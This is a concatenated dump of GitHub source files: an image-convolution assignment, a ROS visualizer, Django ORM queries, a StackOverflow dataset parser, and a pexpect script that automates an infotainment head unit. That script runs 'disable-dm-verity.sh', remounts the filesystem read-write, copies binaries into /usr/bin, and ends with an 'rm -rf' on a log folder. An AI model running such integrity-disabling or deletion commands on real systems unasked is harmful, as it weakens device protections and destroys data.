matriz_imagem = []\n\n with open(nome_imagem) as arquivo:\n\n tipo = arquivo.readline().strip()\n largura, altura = map(int, arquivo.readline().strip().split())\n tamanho_maximo = arquivo.readline().strip()\n\n for linha in arquivo:\n linha = list(map(int, linha.split()))\n matriz_imagem.append(linha)\n\n return largura, altura, matriz_imagem\n\n\ndef calcula_matriz_pixels_convolucao(i, j, fator, matriz_imagem):\n \"\"\"\n Entrada: posição [i][j] do elemento da [matriz_imagem] e o [fator],\n que serve para saber quantas linhas e colunas serão analisadas para \n a realização da convolução\n Saída: uma matriz com lista de elementos da [matriz_imagem] que serão \n usados no cálculo da convolução do elemento na posição [i][j]\n \"\"\"\n\n pixels_convolucao = []\n\n \"\"\"\n As variáveis 'l' e 'k' serve para saber quantas linhas e colunas, \n respectivamente, acima e abaixo do elemento na posição [i][j] temos \n que verificar para achar os outros elementos adjacentes a ele que \n serão usados para fazer a convolucao\n \"\"\"\n\n for l in range(-fator, fator+1):\n\n linha = []\n for k in range(-fator, fator+1):\n\n pixel_adjacente = matriz_imagem[i + l][j + k*3]\n\n linha.append(pixel_adjacente)\n\n pixels_convolucao.append(linha)\n\n return pixels_convolucao\n\n\ndef verifica_dentro_range(novo_elemento):\n\n # Verificando se o elemento não saiu do range(0,255)\n if novo_elemento > 255:\n return 255\n elif novo_elemento < 0:\n return 0\n\n return novo_elemento\n\n\ndef aplicar_filtro(largura, altura, matriz_imagem, kernel):\n\n matriz_imagem_filtrada = []\n\n largura *= 3\n tamanho_kernel = len(kernel)\n\n # Para saber quantas linhas acima e abaixo do elemento vou ter que usar na soma\n # É necessário para casos onde o kernel é diferente do padrão 3x3\n fator = tamanho_kernel // 2\n\n for i in range(altura):\n linha = []\n for j in range(largura):\n novo_elemento = 0\n\n # Verificando se o elemento não está na borda\n if (i >= (1*fator) and i < (altura - (1*fator))) and (j >= (3*fator) and j < (largura - (3*fator))):\n\n # Chamando a função para achar os elementos que serão usados na convolução\n pixels_para_convolucao = calcula_matriz_pixels_convolucao(\n i, j, fator, matriz_imagem)\n\n # 
Realizando a convolução para achar o novo elemento da posição [i][j]\n for l in range(len(kernel)):\n for k in range(len(kernel)):\n novo_elemento += pixels_para_convolucao[l][k] * \\\n kernel[l][k]\n\n novo_elemento = verifica_dentro_range(novo_elemento)\n\n linha.append(int(novo_elemento))\n matriz_imagem_filtrada.append(linha)\n\n return matriz_imagem_filtrada\n\n\ndef escrever_imagem(largura, altura, matriz_filtrada, nome_arquivo):\n \"\"\"\n Entrada: a largura e a altura da imagem, uma matriz que representa\n a imagem com o filtro aplicado e o nome do arquivo a ser criado\n Saída: Não retorna nada, mas cria um arquivo com o nome recebido\n contendo as informações recebidas\n \"\"\"\n\n with open(nome_arquivo, \"w\") as arquivo:\n arquivo.write(\"P3\\n\")\n arquivo.write(f\"{largura} {altura}\\n\")\n arquivo.write(f\"255\\n\")\n\n for linha in matriz_filtrada:\n linha_arquivo = ' '.join(map(str, linha))\n\n arquivo.write(f\"{linha_arquivo}\\n\")\n\n\ndef main():\n\n if(len(sys.argv) >= 4):\n nome_filtro = sys.argv[1]\n nome_imagem = sys.argv[2]\n nome_nova_imagem = sys.argv[3]\n\n kernel = kernel_do_filtro(nome_filtro)\n largura, altura, matriz_imagem = ler_imagem(nome_imagem)\n matriz_filtrada = aplicar_filtro(largura, altura, matriz_imagem, kernel)\n\n escrever_imagem(largura, altura, matriz_filtrada, nome_nova_imagem)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PauloVictorSS/unicamp-mc102","sub_path":"tarefa07/filtros.py","file_name":"filtros.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30702185090","text":"#!/usr/bin/env python\nimport argparse\nimport sys\nimport rospy\nimport numpy as np\nimport copy\nfrom std_msgs.msg import Int32,Float32\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom tf.transformations import quaternion_from_euler\nfrom geometry_msgs.msg import Quaternion\nfrom squirrel_vad_msgs.msg import RecognisedResult \nfrom threading import Lock\nimport rospkg\n#import yaml\nimport pdb\n\nclass SoundViz(object):\n\tdef __init__(self, a_min, a_max, v_min, v_max, threshold = 0.1):\n\t\tself.lock = Lock()\n\t\tself.lock.acquire()\n\t\tself.marker_pub = rospy.Publisher(\"ser_feature_markers\", MarkerArray, queue_size=1)\n\t\tself.ang1 = 0\n\t\tself.ang2 = 0\n\t\tself.arousal = 0\n\t\tself.valence = 0\n\t\tself.duration = 0.0\n\t\tself.a_min = a_min\n\t\tself.a_max = a_max\n\t\t\n\t\tself.v_min = v_min\n\t\tself.v_max = v_max\n\n\t\tself.threshold = threshold\n\t\tself.vad_sub = rospy.Subscriber(\"speech_duration\", Float32, self.vad_cb, queue_size=1)\n\n\t\tself.arousal_sub = rospy.Subscriber(\"arousal\", RecognisedResult, self.arousal_cb, queue_size=1)\n\t\tself.valence_sub = rospy.Subscriber(\"valence\", RecognisedResult, self.valence_cb, queue_size=1)\n\t\t\n\t\tself.pub_tmr = rospy.Timer(rospy.Duration(0.05), self.tmr_cb, oneshot=False)\n\t\tself.lock.release()\n\t\n\tdef vad_cb(self, msg):\n\t\tself.duration = msg\n\n\tdef arousal_cb(self, msg):\n\t\tself.arousal = msg.label\n\t\tself.arousal = (self.arousal - self.a_min)/float(self.a_max - self.a_min)\n\n\tdef valence_cb(self, msg):\n\t\tself.valence = msg.label\n\t\tself.valence = (self.valence - self.v_min)/float(self.v_max - self.v_min)\t\n\t\n\tdef tmr_cb(self, ev):\n\t\tself.lock.acquire()\n\t\t\n\t\tma1 = Marker()\n\t\tma1.header.frame_id = \"sound\"\n\t\tma1.header.stamp = rospy.Time.now()\n\t\tma1.ns = \"my_namespace\"\n\t\tma1.id = 0\n\t\tma1.type = 
Marker.SPHERE\n\t\tma1.action = Marker.ADD\n\t\tma1.pose.position.x = 0\n\t\tma1.pose.position.y = 0\n\t\tma1.pose.position.z = 0\n\t\t\n\t\trospy.loginfo(self.duration)\n\t\tma1.scale.x = 1*(1 + self.arousal * 2)\n\t\tma1.scale.y = 1*(1 + self.arousal * 2)\n\t\tma1.scale.z = 1*(1 + self.arousal * 2)\n\t\t\n\t\tma1.color.a = 1.0\n\t\tma1.color.r = 1.0 if self.valence < self.threshold else 0.0\n\t\tma1.color.g = 1.0 if self.valence > self.threshold else 0.0\n\t\tma1.color.b = 1.0 if self.valence == 0.0 else 0.0\n\n\t\tma1.lifetime = rospy.Duration(0.1)\n\t\tq1 = quaternion_from_euler(0, 0, self.ang1)\n\t\tma1.pose.orientation = Quaternion(x = q1[0],\n\t\t\t\t\t\t\t\t\t\t\t y = q1[1],\n\t\t\t\t\t\t\t\t\t\t\t z = q1[2],\n\t\t\t\t\t\t\t\t\t\t\t w = q1[3])\n\n\t\tma2 = copy.deepcopy(ma1)\n\t\tma2.id = 1\n\t\tq2 = quaternion_from_euler(0, 0, self.ang2)\n\t\tma2.pose.orientation = Quaternion(x = q2[0],\n\t\t\t\t\t\t\t\t\t\t\t y = q2[1],\n\t\t\t\t\t\t\t\t\t\t\t z = q2[2],\n\t\t\t\t\t\t\t\t\t\t\t w = q2[3])\n\n\t\tma_array = MarkerArray()\n\t\tma_array.markers.append(ma1)\n\t\t#ma_array.markers.extend([ma1, ma2])\n\t\tself.marker_pub.publish(ma_array)\n\t\tself.lock.release()\n\nif __name__ == '__main__':\n\n\tsys.argv[len(sys.argv) - 1] = '--name'\n\tsys.argv[len(sys.argv) - 2] = '--default'\n\n\tparser = argparse.ArgumentParser()\n\n\t#options for VAD\n\t#automatic gain normalisation\n\tparser.add_argument(\"-a_min\", \"--a_min\", dest= 'a_min', type=float, help=\"min value of arousal\", default=-1.0)\n\tparser.add_argument(\"-a_max\", \"--a_max\", dest= 'a_max', type=float, help=\"max value of arousal\", default=1.0)\n\t\n\tparser.add_argument(\"-v_min\", \"--v_min\", dest= 'v_min', type=float, help=\"min value of valence\", default=-1.0)\n\tparser.add_argument(\"-v_max\", \"--v_max\", dest= 'v_max', type=float, help=\"max value of valence\", default=1.0)\n\n\tparser.add_argument(\"-th\", \"--threshold\", dest= 'threshold', type=float, help=\"threshold\", default=0.3)\n\tparser.add_argument(\"--default\", help=\"default\", action=\"store_true\")\n\tparser.add_argument(\"--name\", help=\"name\", action=\"store_true\")\n\n\t#parser.add_argument(\"-h\", \"--help\", help=\"help\", action=\"store_true\")\n\n\targs = parser.parse_args()\n\n\trospy.init_node('ser_features_visualizer', anonymous=True)\n\tsv = SoundViz(args.a_min, args.a_max, args.v_min, args.v_max, args.threshold)\n\trospy.spin()","repo_name":"bajo/squirrel_hri_orig","sub_path":"squirrel_ser/src/visualisation_ser.py","file_name":"visualisation_ser.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18302917919","text":"import json\nimport os\nimport pprint\nimport sys\nimport time\n\nimport jsonpath\nimport pexpect\n\nfrom peri_step1 import P_step1\nfrom step2 import Scp\n\nclass P_step1_v2(Scp):\n def __init__(self, json_list=[], json_dict={}):\n Scp.__init__(self)\n self.json_list = json_list\n self.json_dict = json_dict\n # @staticmethod\n # def saveAsFile(file_path, file_name, json_data):\n # path = P_step1_v2.auto_save_file(file_path + \"/\" + file_name)\n # fazit_clip.dump(json_data, open(path, 'w'), ensure_ascii=False,\n # indent=4, separators=(\", \", \" : \"))\n # # print(\"{0} is {1}\".format(\"path\",path))\n # return path\n #\n # @staticmethod\n # def saveFile(file_path, file_name, json_data):\n # path = file_path + os.sep + file_name\n # fazit_clip.dump(json_data, open(path, 'w'), ensure_ascii=False,\n # indent=4, 
separators=(\", \", \" : \"))\n # # print(\"{0} is {1}\".format(\"path\",path))\n # return path\n\n def add_send_expect_v2(self, strS, strE):\n # exec script only:\n newDict = {}\n newDict[\"sendline\"] = strS\n newDict[\"expect\"] = strE\n self.json_list.append(newDict)\n\n def set_pexpect_command_v1(self, json_path, json_file, log_path):\n with open(\"{0}/{1}\".format(json_path, json_file), encoding=\"utf-8\") as json_data, \\\n open(log_path, 'a')as logs:\n data = json.load(json_data)\n spawn_command = jsonpath.jsonpath(data, \"$.head..spawn_command\")[0]\n logs.write(spawn_command + \"\\n\")\n if not False:\n logs.write(\n \"pexpect.spawn(command={0}, , logfile={1}, encoding={2}, timeout={3})\\n\".format(spawn_command, logs,\n \"utf-8\", \"20\"))\n try:\n p = pexpect.spawn(command=spawn_command, logfile=sys.stdout, encoding='utf-8', timeout=10)\n spawn_command_expect = jsonpath.jsonpath(data, \"$.head..spawn_command_expect\")[0]\n logs.write(\"p.expect({0})\\n\".format(spawn_command_expect))\n p.expect(spawn_command_expect)\n for ele_dict in (\n jsonpath.jsonpath(data, \"$.head[?(@.sendline)]\"),\n jsonpath.jsonpath(data, \"$.body[?(@.sendline)]\"), \\\n jsonpath.jsonpath(data, \"$.tail[?(@.sendline)]\")):\n for i in range(len(ele_dict)):\n P_step1_v2.pAction_v3(ele_dict[i], cls=p)\n except pexpect.TIMEOUT:\n print(P_step1_v2.repr_message(\"pexpect.TIMEOUT\"))\n\n @staticmethod\n def pAction_v3(Jdist, cls=None, logFile=None):\n if Jdist.get(\"sendline\", None) != None:\n cls.sendline(Jdist[\"sendline\"])\n else:\n raise ValueError(\"sendline is not given\")\n if Jdist.get(\"expect\", None) != None:\n if isinstance(Jdist.get(\"expect\", None), list) == True: # check if the given is list\n print(f'Jdist[\\\"expect\\\"]: {Jdist[\"expect\"]}')\n index = cls.expect([Jdist[\"expect\"][0],pexpect.TIMEOUT,pexpect.EOF,Jdist[\"expect\"][1]])\n if index == 0:\n print(f\"index: {index}\")\n print(\"We're in status 0\")\n pass\n elif index == 1:\n print(f\"index: {index}\")\n print(\"pexpect.TIMEOUT\")\n elif index == 2:\n print(f\"index: {index}\")\n print(\"pexpect.EOF\")\n elif index == 3:\n print(f\"index: {index}\")\n print(\"We're in status 3\")\n pass\n else:\n cls.expect(Jdist[\"expect\"])\n else:\n cls.buffer = \"\"\n print(\"expect is not given, the sendline is {0}\".format(Jdist.get(\"sendline\", None)))\n\n\ndef persistence_set_key():\n HU_set = P_step1()\n # print(\"*\"*60)\n # print(HU_set.json_dict)\n # print(\"*\"*60)\n # print(\"*\" * 60)\n # print(HU_set.json_list)\n # print(\"*\" * 60)\n HU_set.json_list = []\n HU_set.setProjectDir(os.path.dirname(os.getcwd()))\n HU_set.setJsonDir(\"/fazit_clip\")\n HU_set.set_codingFiles(\"/codingFiles\")\n HU_set.setLogDir(\"/logs\")\n HU_set.log_name += \"/step2_\" + time.strftime(\"%Y%m%d_%H_%M_%S\", time.localtime(time.time())) + \".txt\"\n HU_set.setErrorDir(\"/errors\")\n HU_set.error_name += \"/error_\" + time.strftime(\"%Y%m%d_%H_%M_%S\", time.localtime(time.time())) + \".txt\"\n print(\"{0}:\\t{1}\".format(\"HU_set.codingFiles_dir\", HU_set.codingFiles_dir))\n # json_name = \"persistence.fazit_clip\"\n ####HERE: pls assign value here####\n # HU_set.set_nsKey_dict(\"persistenceOverview_wData_0929.txt\")\n\n HU_set.set_nsKey_dict(\"pers_partNum_5HG035866F.txt\")\n ####pls assign value above####\n HU_set.setJsonDir(\"/fazit_clip\")\n print(\"{0}:\\t{1}\".format(\"HU.json_dir\", HU_set.json_dir))\n HU_set.saveFile(HU_set.json_dir, \"pers_partNum_5HG035866F.fazit_clip\", HU_set.nsKey_dict_list)\n # sys.exit()\n rawDataFile = HU_set.json_dir 
+ \"/\" + \"pers_partNum_5HG035866F.fazit_clip\"\n ns_list = HU_set.get_json_info(rawDataFile, \"$..Namespace_hex\", codingFormat=\"utf_8_sig\")\n key_list = HU_set.get_json_info(rawDataFile, \"$..Key\", codingFormat=\"utf_8_sig\")\n data_list = HU_set.get_json_info(rawDataFile, \"$..Data\", codingFormat=\"utf_8_sig\")\n for ns, key, data in zip(ns_list, key_list, data_list):\n if ns.startswith(\"0x\") and key.startswith(\"0x\"):\n HU_set.add_send_expect(\n strS=\"./tsd.persistence.client.mib3.app.SetKey --ns {0} --key {1} --val 0x{2}\".format(ns, key, data) \\\n , strE=\"store: ns: {0} key: {1} slot: 0\".format(ns[2:], int(key, 16)), \\\n str_ns=ns, str_key=key, str_data=data)\n HU_set.combineAsJson_v2(\"/usr/bin\") # In this func, it sets the self.json_dict\n HU_set.saveFile(HU_set.json_dir, \"SetKey_\" + \"pers_partNum_5HG035866F.fazit_clip\", HU_set.json_dict)\n HU_set.set_pexpect_command_v2(HU_set.json_dir, \"SetKey_\" + \"pers_partNum_5HG035866F.fazit_clip\", HU_set.log_name, HU_set.error_name)\n pprint.pprint(HU_set.key_data_list)\n\nif __name__ == '__main__':\n import subprocess\n\n\n\n def check_ping(address = \"192.168.1.4\"):\n str1 = 'ping -c 3 '\n str2 = address\n str3 = ' | grep \\'0 received\\' | wc -l'\n command = str1 + str2 + str3\n print(command)\n p = subprocess.Popen(command,shell=True, stdout=subprocess.PIPE)\n result = p.stdout.read()\n return result.strip().decode(\"utf-8\")\n\n\n while True:\n if check_ping(\"192.168.1.4\") == \"0\":\n break\n else:\n pass\n\n from step2 import transfer\n transfer(\"/var\")\n\n # sys.exit()\n HU_exec = P_step1_v2()\n HU_exec.setProjectDir(os.path.dirname(os.getcwd()))\n HU_exec.setJsonDir(\"fazit_clip\")\n HU_exec.setLogDir(\"logs\")\n HU_exec.log_path = HU_exec.logs_folder + \"/HU_exec_\" + time.strftime(\"%Y%m%d_%H_%M_%S\",\n time.localtime(time.time())) + \".txt\"\n HU_exec.add_send_expect_v2(strS = \"disable-dm-verity.sh\", strE = [\"Connection\",\"infotainment\"])\n HU_exec.combineAsJson_v2(\"/var\")\n HU_exec.saveFile(HU_exec.json_folder, \"[default]exec_disable-dm-verity.fazit_clip\", HU_exec.json_dict)\n HU_exec.set_pexpect_command_v1(HU_exec.json_folder, \"[default]exec_disable-dm-verity.fazit_clip\", HU_exec.log_path)\n # sys.exit()\n\n HU_exec = P_step1_v2()\n HU_exec.json_list = []\n HU_exec.setProjectDir(os.path.dirname(os.getcwd()))\n HU_exec.setJsonDir(\"fazit_clip\")\n HU_exec.setLogDir(\"logs\")\n HU_exec.log_path = HU_exec.logs_folder + \"/HU_exec_\" + time.strftime(\"%Y%m%d_%H_%M_%S\", time.localtime(time.time())) + \".txt\"\n HU_exec.add_send_expect_v2(strS=\"mount-read-write.sh\", strE = \"infotainment\")\n HU_exec.add_send_expect_v2(strS=\"scp -r tsd.persistence.client.mib3.app.* /usr/bin\", strE=\"infotainment\")\n HU_exec.add_send_expect_v2(strS=\"cd /usr/bin\", strE=\"/usr/bin\")\n HU_exec.setToolDir(\"tools\")\n HU_exec.setFileList(HU_exec.tools_folder)\n for i in HU_exec.fileList:\n HU_exec.add_send_expect(f\"sha1sum {os.path.split(i)[-1]}\",\n f\"{HU_exec.getSha1sum(i).split()[0]} {os.path.split(i)[-1]}\")\n HU_exec.combineAsJson_v2(\"/var\")\n HU_exec.saveFile(HU_exec.json_folder, \"[default]transfer_files_to_var.fazit_clip\", HU_exec.json_dict)\n HU_exec.set_pexpect_command_v1(HU_exec.json_folder, \"[default]transfer_files_to_var.fazit_clip\", HU_exec.log_path)\n # sys.exit()\n\n persistence_set_key()\n os.system(\"rm -rf 
/home/jpcc/PycharmProjects/pythonProject_Oct_2022/coding_file_version3/logs/*\")\n\n","repo_name":"benefactor007/pythonProject_Oct_2022","sub_path":"coding_file_version3/main/prei_write_v1.py","file_name":"prei_write_v1.py","file_ext":"py","file_size_in_byte":8892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15389615728","text":"#! /usr/bin/env python\r\n#coding=utf-8\r\nimport numpy as np\r\n\r\nclass Embedding:\r\n def __init__(self):\r\n self.d={}\r\n \r\n count=0\r\n for line in open(r'data/model.w2v.txt','rb'):\r\n line=line.strip()\r\n if len(line)>0 and count>0:\r\n p=line.split(' ')\r\n emb_len=len(p)-1\r\n word=p[0].strip()\r\n v=np.empty((emb_len),dtype=\"float32\")\r\n for i in range(emb_len):\r\n v[i]=float(p[i+1])\r\n self.d[word]=v\r\n count+=1\r\n \r\n def embed_word(self,w):\r\n if w not in self.d:\r\n return None\r\n else:\r\n return self.d[w]\r\n","repo_name":"wangzq870305/ddos_forecast","sub_path":"embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"} +{"seq_id":"26003580831","text":"from django.shortcuts import render, redirect\nfrom .models import League, Team, Player\nfrom django.db.models import Count\n\nfrom . import team_maker\n\ndef index(request):\n\tcontext = {\n\t\t\"leagues\": League.objects.all(),\n\t\t\"teams\": Team.objects.all(),\n\t\t\"players\": Player.objects.all(),\n\t\t\"atlantic_soccer_teams\": Team.objects.filter(league__name='Atlantic Soccer Conference'),\n\t\t\"curr_boston_players\": Player.objects.filter(curr_team__team_name='Penguins',curr_team__location='Boston'),\n\t\t\"Baseball_curr_players\": Player.objects.filter(curr_team__league__name=\"International Collegiate Baseball Conference\"),\n\t\t\"american_curr_players\": Player.objects.filter(curr_team__league__name=\"American Conference of Amateur Football\", last_name='Lopez'),\n\t\t'football_players':Player.objects.filter(curr_team__league__sport=\"Football\"),\n\t\t'sophia_teams':Team.objects.filter(curr_players__first_name=\"Sophia\"),\n\t\t'sophia_leagues':League.objects.filter(teams__curr_players__first_name=\"Sophia\"),\n\t\t'Flores_not_in_Roughriders':Player.objects.filter(last_name='Flores').exclude(curr_team__location='Washington',curr_team__team_name='Roughriders'),\n\t\t'Samuel_teams':Team.objects.filter(all_players__first_name=\"Samuel\", all_players__last_name=\"Evans\"),\n\t\t'Tiger_Cats_Players':Player.objects.filter(all_teams__location=\"Manitoba\", all_teams__team_name='Tiger-Cats'),\n\t\t'vikings_formerly_players':Player.objects.filter(all_teams__location=\"Wichita\" , all_teams__team_name=\"Vikings\").exclude(curr_team__location=\"Wichita\", curr_team__team_name='Vikings'),\n\t\t'jacob_former_teams':Team.objects.filter(all_players__first_name=\"Jacob\", all_players__last_name=\"Gray\").exclude(team_name='Colts', location='Oregon'),\n\t\t'all_joshua_in_atlantic':Player.objects.filter(first_name=\"Joshua\", all_teams__league__name='Atlantic Federation of Amateur Baseball Players'),\n\t\t'12_players_teams':Team.objects.annotate(counter=Count('all_players')).filter(counter__gte=12),\n\t\t'players_and_counts':Player.objects.annotate(counts=Count('all_teams')).order_by('counts'),\n\t}\n\treturn render(request, \"leagues/index.html\", context)\n\ndef make_data(request):\n\tteam_maker.gen_leagues(10)\n\tteam_maker.gen_teams(50)\n\tteam_maker.gen_players(200)\n\n\treturn 
redirect(\"index\")","repo_name":"Reem310/Django","sub_path":"Django_ORM/sports_orm_2/leagues/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23593510480","text":"'''\n构造数据集,主要包括两个函数\n1. attr_extractor\n主要用于过滤优质问题,输入输出都是xml文件\n2. content_extractor\n主要用于过滤不符合文本+代码、长度要求、和其它tag重复的内容,输入为xml,输出为json\n'''\nimport xmltodict\nimport ipdb\nimport datetime\nfrom collections import Counter, OrderedDict\nfrom tqdm import tqdm\nimport html\nimport json\nfrom html.parser import HTMLParser\nfrom transformers import RobertaTokenizer\nimport time\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import PercentFormatter\n\nBATCH_SIZE = 1000\nLANGUAGES = set(['', '', '', '', '', '', ''])\n\nspecial_tokens_id = list(range(33, 48))\nspecial_tokens_id += list(range(58, 65))\nspecial_tokens_id += list(range(91, 97))\nspecial_tokens_id += list(range(123, 127))\nspecial_tokens = [chr(i) for i in special_tokens_id]\n\ndef convention_tokenize(text):\n '''\n 针对特殊符号分词\n '''\n for st in special_tokens:\n text = f' {st} '.join(text.split(st)).strip()\n tokens = text.split()\n return tokens\n\ndef plot_histogram(x, distance):\n '''\n x is a list containing numbers\n distance is an int number indicating the x-axis distance\n '''\n d = distance\n plt.figure()\n min_x = int(min(x))\n max_x = int(max(x))\n range_by_d = range(min_x, max_x + d, d)\n plt.hist(x, range_by_d, weights=np.ones(len(x))/len(x))\n plt.xticks(range_by_d)\n plt.gca().yaxis.set_major_formatter(PercentFormatter(1))\n plt.grid()\n plt.show()\n\nclass OrderedCounter(Counter, OrderedDict):\n def __repr__(self):\n return \"%s(%r)\" % (self.__class__.__name__, OrderedDict(self))\n\ndef write_lines(lines, target):\n with open(target, 'a', encoding='utf-8') as f:\n f.writelines(lines)\n\ndef line_counter(source_path):\n '''\n 简单统计文件行数\n '''\n count = 0\n with open(source_path, 'r', encoding='utf-8') as f:\n for line in tqdm(f):\n count += 1\n print(f'{source_path} total {count} lines')\n return count\n\ndef include_extractor(\n source_path, target_path,\n filters, total_line_count=None\n ):\n '''\n 根据包含关系抽取数据行\n '''\n result = []\n target_line_count = 0\n if not total_line_count:\n total_line_count = line_counter(source_path)\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_line_count)\n for line in f:\n t.update(1)\n flag_to_keep = True\n for fltr in filters:\n if fltr not in line:\n flag_to_keep = False\n if not flag_to_keep:\n continue\n result.append(line)\n target_line_count += 1\n if len(result) == BATCH_SIZE:\n write_lines(result, target_path)\n result.clear()\n t.close()\n if result:\n write_lines(result, target_path)\n print(f'{target_path} total line {target_line_count}')\n\ndef attr_counter(source_path, attr, total_line_count=None, condition_func=lambda x: True):\n '''\n 根据属性统计数量特征\n '''\n counts = []\n if not total_line_count:\n total_line_count = line_counter(source_path)\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_line_count)\n for line in f:\n line_json = xmltodict.parse(line)\n if condition_func(line_json['row']):\n counts.append(line_json['row'][attr])\n t.update(1)\n t.close()\n count_result = Counter(counts).most_common()\n percentage_result = dict()\n accumulative_count = dict()\n # for item in count_result:\n # percentage_result[item[0]] = round(item[1]/total_line_count, 2)\n for item in count_result:\n bigger_count 
= 0\n for comparable_item in count_result:\n if int(comparable_item[0]) >= int(item[0]):\n bigger_count += comparable_item[1]\n accumulative_count[item[0]] = bigger_count\n print(total_line_count)\n # print(count_result)\n # print(percentage_result)\n print(accumulative_count)\n return count_result, percentage_result, accumulative_count\n\ndef attr_extractor(\n source_path, target_path,\n condition_func, total_line_count=None\n ):\n '''\n 按照属性条件进行抽取\n '''\n result = []\n if not total_line_count:\n total_line_count = line_counter(source_path)\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_line_count)\n for line in f:\n line_json = xmltodict.parse(line)\n if condition_func(line_json['row']):\n result.append(line)\n if len(result) == BATCH_SIZE:\n write_lines(result, target_path)\n result.clear()\n t.update(1)\n t.close()\n if result:\n write_lines(result, target_path)\n\ndef time_counter(source_path, total_len):\n '''\n 按年/月统计问题数量\n '''\n by_month = []\n by_year = []\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n for line in f:\n # line_json = xmltodict.parse(line)\n # time_str = line_json['row']['@CreationDate']\n line_json = json.loads(line.strip())\n time_str = line_json['@CreationDate']\n time_obj = datetime.datetime.strptime(time_str,'%Y-%m-%dT%H:%M:%S.%f')\n # by_month.append(time_obj.strftime('%Y-%m'))\n by_year.append(time_obj.strftime('%Y'))\n t.update(1)\n t.close()\n # print(OrderedCounter(by_month))\n print(OrderedCounter(by_year))\n\n'''\n解析post body中的html标签\n'''\nclass BodyParser(HTMLParser):\n def __init__(self):\n super(BodyParser, self).__init__()\n self.result = []\n self.current_tag = None\n self.current_text = ''\n self.current_code = ''\n\n def simplify_tag(self, tag):\n if tag == 'code':\n return tag\n return 'text'\n\n def handle_starttag(self, tag, attrs):\n tag = self.simplify_tag(tag)\n if not self.current_tag:\n self.current_tag = tag\n return\n if tag == 'code' and tag != self.current_tag:\n self.result.append(('text', self.current_text))\n self.current_text = ''\n elif tag == 'text' and tag != self.current_tag:\n self.result.append(('code', self.current_code))\n self.current_code = ''\n self.current_tag = tag\n\n\n def handle_endtag(self, tag):\n tag = self.simplify_tag(tag)\n if tag == 'code': \n self.result.append(('code', self.current_code))\n self.current_code = ''\n self.current_tag = 'text' # 因为中不会有别的标签\n elif tag == 'text':\n self.result.append(('text', self.current_text))\n self.current_text = ''\n\n def handle_data(self, data):\n data = html.unescape(data).strip()\n if not data:\n return\n if self.current_tag == 'text':\n self.current_text += f'{data} '\n elif self.current_tag == 'code':\n self.current_code += f'{data} '\n \n def denoising(self, data):\n # 删去content中的特殊字符\n for char in ['\\r\\n', '\\r', '\\n']:\n data = data.replace(char, ' ')\n data = ''.join([i if ord(i) < 128 else ' ' for i in data])\n data = ' '.join(data.split())\n return data\n\n def get_result(self):\n '''\n 返回空值:\n 1. 该行解析结果为空\n 2. 
does not simultaneously contain code and text\n '''\n if not self.result:\n return []\n merged_result = []\n last_tag = self.result[0][0]\n current_content = self.result[0][1]\n for segment in self.result[1:]:\n tag, content = segment\n if (not content) or (not content.strip()):\n continue\n if tag != last_tag:\n merged_result.append((last_tag, current_content))\n last_tag = tag\n current_content = content\n continue\n current_content += content\n merged_result.append((last_tag, current_content))\n cleaned_result = []\n # drop blank content\n for item in merged_result:\n if not item[1]:\n continue\n denoised_content = self.denoising(item[1])\n if denoised_content:\n cleaned_result.append((item[0], denoised_content))\n return cleaned_result\n\ndef content_counter(source_path, total_len, language):\n '''\n count the total number of each kind of tag\n '''\n tag_count = {\n 'code': 0,\n 'text': 0\n } # number of questions that contain each kind of tag\n lang_tags = set()\n other_language_tags = LANGUAGES - set([f'<{language}>'])\n repeated_question = 0\n blank_line = 0\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n for line in f:\n t.update(1)\n line_json = xmltodict.parse(line)\n body_str = line_json['row']['@Body']\n\n tags_raw = line_json['row']['@Tags']\n for lang_tag in other_language_tags:\n if lang_tag in tags_raw:\n repeated_question += 1\n break\n\n parser = BodyParser()\n parser.feed(body_str)\n content = parser.get_result()\n if not content:\n blank_line += 1\n continue\n tags = set()\n for segment in content:\n tag, tag_content = segment\n tags.add(tag)\n for tag in tags:\n # count the questions that contain this tag\n tag_count[tag] += 1 \n t.close()\n print(f'total: {total_len}')\n print(tag_count)\n print(blank_line)\n print(f'repeated_question {repeated_question}')\n\n'''\nparse the html tags in the post body\n'''\ndef content_extractor(source_path, target_path, total_len, language):\n '''\n turn the xml data into the json data we will finally use\n '''\n result = []\n other_language_tags = LANGUAGES - set([f'<{language}>'])\n # tokenizer = RobertaTokenizer.from_pretrained('microsoft/codebert-base', do_lower_case=False)\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n blank_lines = 0\n only_code = 0\n only_text = 0\n for line in f:\n t.update(1)\n line_json = xmltodict.parse(line)\n body_str = line_json['row']['@Body']\n parser = BodyParser()\n parser.feed(body_str)\n line_parsed = parser.get_result()\n # remove posts that duplicate another language's posts\n language_tag_flag = False\n tags_raw = line_json['row']['@Tags']\n for lang_tag in other_language_tags:\n if lang_tag in tags_raw:\n language_tag_flag = True\n if language_tag_flag:\n continue\n # drop content that does not contain both text and code\n if not line_parsed:\n blank_lines += 1\n continue\n tags = [item[0] for item in line_parsed]\n if ('code' in tags) and ('text' not in tags):\n only_code += 1\n continue\n elif ('text' in tags) and ('code' not in tags):\n only_text += 1\n continue\n line_json['row']['@Body'] = line_parsed\n # drop posts whose tokenized length is too short or too long\n len_item = {\n 'total': 0,\n 'text': 0,\n 'code': 0\n }\n for segment in line_json['row']['@Body']:\n if segment[0] == 'text':\n len_item['text'] += 